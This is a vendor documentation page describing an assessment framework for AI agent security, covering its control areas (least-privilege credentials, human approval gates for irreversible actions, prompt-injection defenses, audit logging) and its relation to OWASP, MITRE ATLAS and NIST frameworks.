Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.ayliea.com/llms.txt

Use this file to discover all available pages before exploring further.

AI Agent Security

AI agents are LLMs given the ability to take actions in the real world — call APIs, write to databases, send emails, execute code, browse systems. The blast radius of an agent equals the blast radius of every tool it can call. This framework covers the controls that make agentic deployments safe. The assessment is appropriate when your organization runs customer-facing copilots, internal automation agents, computer-use agents (e.g., browser-driving assistants), code-writing agents, or any LLM-driven workflow that takes consequential actions beyond returning text.
Use AI Agent Security alongside AI Security (AISS) for organizations deploying agents at scale. AISS covers the broader AI program; AI Agent Security drills into the specific guardrails required for agentic systems.

What this framework covers

The assessment spans control areas that directly address the OWASP LLM06 Excessive Agency risk and the MITRE ATLAS agentic-AI technique cluster (T0080, T0086, T0098–T0112).
Approval workflow before agents reach production, risk classification of agent use cases, complete agent inventory, deployment controls, and pre-production review processes.
OAuth scope limits, API key scoping and rotation, user-impersonation boundaries, secret storage patterns, and the credential model for agents acting on a user’s behalf.
Per-agent tool manifests, human-in-the-loop approval gates for irreversible actions, server-side blast-radius limits (rate caps, monetary ceilings, scope predicates), and write-action authorization.
Defense against direct and indirect prompt injection: input validation, retrieved-content trust boundaries, instruction-data separation, and output filtering before downstream actions execute.
Per-invocation audit logs tying actions to both the agent and the human principal, anomaly detection on tool-call patterns, prompt/response logging, and tamper-evident log retention.

Why this matters for customers

Customers deploying AI agents face a structural risk that didn’t exist with traditional software: one prompt injection or one misaligned decision can cascade into data loss, financial loss, or customer-facing incidents. The AI Agent Security assessment surfaces:
  • Whether your agents have least-privilege grants or whether they inherit broad user permissions
  • Whether irreversible actions (deletes, payments, account changes, code merges, outbound customer messages) require a synchronous human approval gate
  • Whether tool invocations are logged with sufficient detail to investigate after a guardrail failure
  • Whether your team has run adversarial testing on the agent guardrails specifically

How it relates to other frameworks

AI Agent Security focuses narrowly on the agent layer. For the surrounding controls — data governance, model security, supply chain, training and awareness — pair it with the AI Security (AISS) assessment. For LLM application risks more broadly (not just agents), see the OWASP LLM Top 10 assessment. For the foundational risk-management lifecycle, see NIST AI RMF.

Glass-Box scoring

Every score on this framework is reproducible from the published rubric: weighted category scores, per-question maturity tiers, and citations to MITRE ATLAS technique IDs and OWASP LLM Top 10 entries. Auditors can verify any sub-score line by line.